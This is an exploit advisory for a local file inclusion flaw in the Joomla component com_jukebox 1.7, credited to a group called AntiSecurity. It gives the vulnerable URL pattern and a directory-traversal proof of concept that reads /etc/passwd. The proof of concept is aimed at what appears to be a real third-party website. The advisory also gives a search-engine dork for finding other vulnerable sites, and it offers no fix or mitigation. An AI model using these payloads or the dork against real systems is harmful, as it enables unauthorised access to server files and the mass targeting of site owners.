Joomla Component Juke Box LFI Vuln


[o] Joomla Component Juke Box Local File Inclusion Vulnerability
Software : com_jukebox version 1.7
Vendor : http://www.jooforge.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_jukebox&controller=[LFI]


[o] PoC
http://www.livequrantutors.com/app/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../etc/passwd


[o] Dork
inurl:"com_jukebox"